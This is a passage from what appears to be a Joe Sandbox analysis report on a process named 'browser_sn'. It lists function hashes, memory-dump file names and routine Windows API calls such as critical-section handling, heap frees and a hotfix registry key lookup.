                                                                            • Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                            • Instruction ID: b30d9ac3ced1d7e2b38a830b3dcdf9631d1a03aafa2a6e641a291beedd57cd95
                                                                            • Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                            • Instruction Fuzzy Hash: 28017C32A04A8281EB98DF65E4457A93360FF85B6DF484231CBBD867D5CF78D495C380
                                                                            APIs
                                                                            Strings
                                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009, xrefs: 00007FF6C2B8678B
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
                                                                            • API String ID: 47109696-713323490
                                                                            • Opcode ID: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                            • Instruction ID: 4a888b0be35dbd6f07552a6ffce3bd08100d2db88c1937925163a2e20b15b3c6
                                                                            • Opcode Fuzzy Hash: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                            • Instruction Fuzzy Hash: 33F0AF36A1868281DB508F24E40436AA3B0EF55B9DF640036DF8C877A4EFAEC084C744
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: free$ErrorFreeHeapLast_errnomalloc
                                                                            • String ID:
                                                                            • API String ID: 1225357528-0
                                                                            • Opcode ID: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                            • Instruction ID: eb5ce44b7691f72a43b6a2639d21dd5eac0e5036d9c595cf958649739a667386
                                                                            • Opcode Fuzzy Hash: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                            • Instruction Fuzzy Hash: 8811B459F2C58242FA80AB2AB1413BF5211AF85BCDF440530FF8D8BB8BDE6CD4824704
                                                                            APIs
                                                                            • TlsGetValue.KERNEL32(?,?,00000000,00007FF6C2C17423), ref: 00007FF6C2C17338
                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF6C2C17423), ref: 00007FF6C2C17352
                                                                            • InitializeCriticalSection.KERNEL32(?,?,00000000,00007FF6C2C17423), ref: 00007FF6C2C1739C
                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF6C2C17423), ref: 00007FF6C2C173E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterInitializeLeaveValue
                                                                            • String ID:
                                                                            • API String ID: 3200804837-0
                                                                            • Opcode ID: 9b57fd7c55fe75021aeb7447fd861e4cda4a0a672ebbe4cb5d50cbd8ffadb556
                                                                            • Instruction ID: bc06e5b30e32149b679a34ad48206d3c3de744a8c810fe1f2e9bfdb0f878e616
                                                                            • Opcode Fuzzy Hash: 9b57fd7c55fe75021aeb7447fd861e4cda4a0a672ebbe4cb5d50cbd8ffadb556
                                                                            • Instruction Fuzzy Hash: 84210932A19B8291EA809F11E95026873B4FB58B89F444135DFCD83764DFBCE4A9C310